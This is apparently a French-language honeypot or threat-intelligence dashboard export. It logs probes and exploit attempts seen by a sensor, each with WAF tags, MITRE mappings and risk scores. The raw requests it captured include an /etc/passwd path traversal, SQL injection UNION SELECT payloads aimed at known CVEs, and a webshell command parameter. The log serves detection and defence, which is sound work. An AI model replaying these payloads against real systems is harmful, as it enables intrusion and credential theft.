GET /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.5 Safari/605.1.15 Accept: */* A |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) · → /.axiom/accounts/do.json | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /.axiom/accounts/do.json UA Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (K…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/.axiom/accounts/do.json
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/.axiom/accounts/do.json
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 62%
Confiance classification
70%
Corrélation +8
Risque capteur
Moyen
· 52
Confiance : Confiance 62 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /.axiom/accounts/do.json HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/
Requête brute (extrait)
GET /.axiom/accounts/do.json HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.107 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /.axiom/accounts/do.json HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 6 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /.axiom/accounts/do.json HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36
Requête brute (extrait)
GET /.axiom/accounts/do.json HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /index.php | Élevée | Moyen · 60 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /index.php UA Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Ge…
Émulateur
HTTP
WAF
50
Recommandation
Investiguer
Tags
Cible HTTP
GET
/index.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/index.php
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
67%
Corrélation +8
Risque capteur
Moyen
· 60
Confiance : Confiance 59 % — 7 tag(s) WAF
Protocole émulé
1
Signaux
CRS-930100-sub
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36
Règles WAF
sqli-0
lfi-14
rce-0
rce-14
nosqli-3
Payload (extrait)
GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'
Requête brute (extrait)
GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like
|
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 32 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 32
Confiance : Confiance 0 % — 5 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'
Requête brute (extrait)
GET /index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20- HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:124.0) Gecko/20100101 Firef
|
|||||||
| TCP | 7001 · HTTP | http | Upload webshell webshell upload · via HTTP:7001 · (tentative d'exploit) · → /device.rsp | Élevée | Moyen · 64 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /device.rsp UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/201001…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/device.rsp
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/device.rsp
Service
HTTP
Pourquoi cette classification : Règle WAF « webshell-param-cmd » · Paramètres de scan · confiance 50%
Confiance classification
58%
Corrélation +8
Risque capteur
Moyen
· 64
Confiance : Confiance 50 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0
Règles WAF
rce-0
nosqli-3
webshell-param-cmd
Payload (extrait)
GET /device.rsp?opt=user&cmd=list HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0
Requête brute (extrait)
GET /device.rsp?opt=user&cmd=list HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Traversal LFI lfi path traversal · via HTTP:7001 · (tentative d'exploit) · → /seeyon/thirdpartyController.do.css/..;/ajax.do | Élevée | Moyen · 59 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /seeyon/thirdpartyController.do.css/..;/ajax.do UA Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, lik…
Émulateur
HTTP
WAF
26
Recommandation
Investiguer
Tags
Cible HTTP
GET
/seeyon/thirdpartyController.do.css/..;/ajax.do
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/seeyon/thirdpartyController.do.css/..;/ajax.do
Service
HTTP
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
67%
Corrélation +8
Risque capteur
Moyen
· 59
Confiance : Confiance 59 % — Motif catalogue confirmé · 4 tag(s) WAF
Protocole émulé
1
Signaux
pat-0083
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930110
Ligne de requête
User-Agent
Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Debian; Linux i686
Requête brute (extrait)
GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Debian; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/136.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /device.rsp?opt=user&cmd=list HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) A
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 6 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /device.rsp?opt=user&cmd=list HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) A
Requête brute (extrait)
GET /device.rsp?opt=user&cmd=list HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.0 Safari/605.1.15 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Traversal LFI lfi path traversal · via DOCKER:2375 · (tentative d'exploit) | Élevée | Moyen · 48 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel M
Pourquoi cette classification : Type « lfi_path_traversal » (signaux protocolaires) · confiance 59%
Confiance classification
67%
Corrélation +8
Risque capteur
Moyen
· 48
Confiance : Confiance 59 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
pat-0083
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
CRS 930110
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel M
Requête brute (extrait)
GET /seeyon/thirdpartyController.do.css/..;/ajax.do HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 14.3) AppleWebKit/614.31.14 (KHTML, like Gecko) Version/17.0.96 Safari/614.31.14 Accept: */* Accept-Language: en Acce |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) | Élevée | Moyen · 48 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET / UA Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.10
Émulateur
HTTP
WAF
16
Recommandation
Surveiller
Tags
Cible HTTP
GET
/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 62%
Confiance classification
70%
Corrélation +8
Risque capteur
Moyen
· 48
Confiance : Confiance 62 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.10
Règles WAF
rce-0
nosqli-3
sap-sapcontrol-path
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.10 Accept: */*
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (X11; Linux i686; rv:1.9.7.20) Gecko/ Firefox/3.6.10 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | SSRF interne ssrf internal · via DOCKER:2375 · (tentative d'exploit) | Élevée | Moyen · 49 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET / HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, li
Pourquoi cette classification : Type « ssrf_internal » (signaux protocolaires) · confiance 54%
Confiance classification
62%
Corrélation +8
Risque capteur
Moyen
· 49
Confiance : Confiance 54 % — Motif catalogue confirmé
Protocole émulé
1
Signaux
CRS-920350
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
User-Agent
—
Règles WAF
—
Payload (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, li
Requête brute (extrait)
GET / HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /overview.asp HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 6 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /overview.asp HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1
Requête brute (extrait)
GET /overview.asp HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Macintosh, Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.1.15 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) · → /overview.asp | Élevée | Moyen · 44 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /overview.asp UA Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100…
Émulateur
HTTP
WAF
13
Recommandation
Surveiller
Tags
Cible HTTP
GET
/overview.asp
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/overview.asp
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 62%
Confiance classification
70%
Corrélation +8
Risque capteur
Moyen
· 44
Confiance : Confiance 62 % — 2 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /overview.asp HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/2010010
Requête brute (extrait)
GET /overview.asp HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /users/sign_in HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, l
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 6 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /users/sign_in HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, l
Requête brute (extrait)
GET /users/sign_in HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Kubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | probe users probe users · via HTTP:7001 · (sonde / probe) · → /users/sign_in | Élevée | Moyen · 48 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
GET /users/sign_in UA Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605…
Émulateur
HTTP
WAF
19
Recommandation
Surveiller
Tags
Cible HTTP
GET
/users/sign_in
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/users/sign_in
Service
HTTP
Pourquoi cette classification : Type « probe_users » (signaux protocolaires) · confiance 50%
Confiance classification
58%
Corrélation +8
Risque capteur
Moyen
· 48
Confiance : Confiance 50 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
Upstream
Waf Score
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
Ligne de requête
User-Agent
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /users/sign_in HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.
Requête brute (extrait)
GET /users/sign_in HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1 Safari/605.1.15 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 2375 · DOCKER | docker | Sonde API Docker docker api probe · via DOCKER:2375 · (sonde / probe) | Élevée | Faible · 33 |
|
|
|
Étape
Sonde / probe
Chaîne
Découverte
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0007
TA0007
TA0001
Protocole
Émulateur
DOCKER
WAF
—
Recommandation
Surveiller
Tags
Cible HTTP
—
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
—
Port
2375
Chemin / cible
—
Service
DOCKER
Payload
GET /wp-content/themes/listingpro/style.css HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x6
Pourquoi cette classification : Type « docker_api_probe » (signaux protocolaires) · confiance 0%
Confiance classification
8%
Corrélation +8
Risque capteur
Faible
· 33
Confiance : Confiance 0 % — 6 signal(aux) capteur
Protocole émulé
1
Technique MITRE
TA0007
Tactiques MITRE
TA0007
TA0001
User-Agent
—
Règles WAF
—
Payload (extrait)
GET /wp-content/themes/listingpro/style.css HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x6
Requête brute (extrait)
GET /wp-content/themes/listingpro/style.css HTTP/1.1 Host: 62.3.50.33:2375 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:140.0) Gecko/20100101 Firefox/140.4 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) · → /wp-content/themes/listingpro/style.css | Élevée | Moyen · 52 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
TA0001
TA0001
TA0002
Protocole
GET /wp-content/themes/listingpro/style.css UA Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/wp-content/themes/listingpro/style.css
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/wp-content/themes/listingpro/style.css
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 62%
Confiance classification
70%
Corrélation +8
Risque capteur
Moyen
· 52
Confiance : Confiance 62 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
TA0001
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /wp-content/themes/listingpro/style.css HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) G
Requête brute (extrait)
GET /wp-content/themes/listingpro/style.css HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0 Accept: */* Accept-Language: en Accept-Encoding: gzip |
|||||||
| TCP | 7001 · HTTP | http | Tentative d'exploit exploit attempt · via HTTP:7001 · (tentative d'exploit) · → /plus/ajax_common.php | Élevée | Moyen · 61 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1190
TA0001
TA0002
Protocole
GET /plus/ajax_common.php UA Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/1…
Émulateur
HTTP
WAF
28
Recommandation
Investiguer
Tags
Cible HTTP
GET
/plus/ajax_common.php
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/plus/ajax_common.php
Service
HTTP
Pourquoi cette classification : Tentative d'exploit (tag rce-0) · confiance 95%
Confiance classification
100%
Corrélation +8
Risque capteur
Moyen
· 61
Confiance : Confiance 95 % — 4 tag(s) WAF
Protocole émulé
1
Signaux
MITRE-T1190
Technique MITRE
T1190
Tactiques MITRE
TA0001
TA0002
Ligne de requête
User-Agent
Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/139.0
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1 Host: 62.3.50.
Requête brute (extrait)
GET /plus/ajax_common.php?act=hotword&query=aa%%e9%8c%a6%27%20union%20select%201,md5(999999999),3%23%27 HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (Windows NT 6.2; rv:139.0) Gecko/20100101 Firefox/139.0 Accept: */* Accept-Language: en Acce |
|||||||
| TCP | 7001 · HTTP | http | Sonde fichier configuration config file probe · via HTTP:7001 · (tentative d'exploit) · → /admin/ | Élevée | Moyen · 59 |
|
|
|
Étape
Tentative d'exploit
Chaîne
Exploitation
Persona
mail.sensor-1.internal
Rôle capteur
Renseignement menaces
Corrélations
MITRE
T1083
TA0001
TA0002
Protocole
GET /admin/ UA Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Ge…
Émulateur
HTTP
WAF
19
Recommandation
Investiguer
Tags
Cible HTTP
GET
/admin/
TLS SNI
—
Capteur
paris-1
|
|||||||
Preuve / Evidence
Méthode
GET
Port
7001
Chemin / cible
/admin/
Service
HTTP
Pourquoi cette classification : Sonde fichier sensible: chemin sensible (tag interne) · Règle WAF « rce-0 » · Sonde fichier sensible / config · confiance 100%
Confiance classification
100%
Corrélation +8
Risque capteur
Moyen
· 59
Confiance : Confiance 100 % — 3 tag(s) WAF
Protocole émulé
1
Signaux
Http Sensitive
Upstream
Waf Score
Technique MITRE
T1083
Tactiques MITRE
TA0001
TA0002
Motifs de détection (base)
SSRF Any-address SSRF
ET Magento admin
ES admin GET
ActiveMQ console
Ligne de requête
User-Agent
Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Règles WAF
rce-0
nosqli-3
Payload (extrait)
GET /admin/ HTTP/1.1 Host: 62.3.50.33:7001 User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chr
Requête brute (extrait)
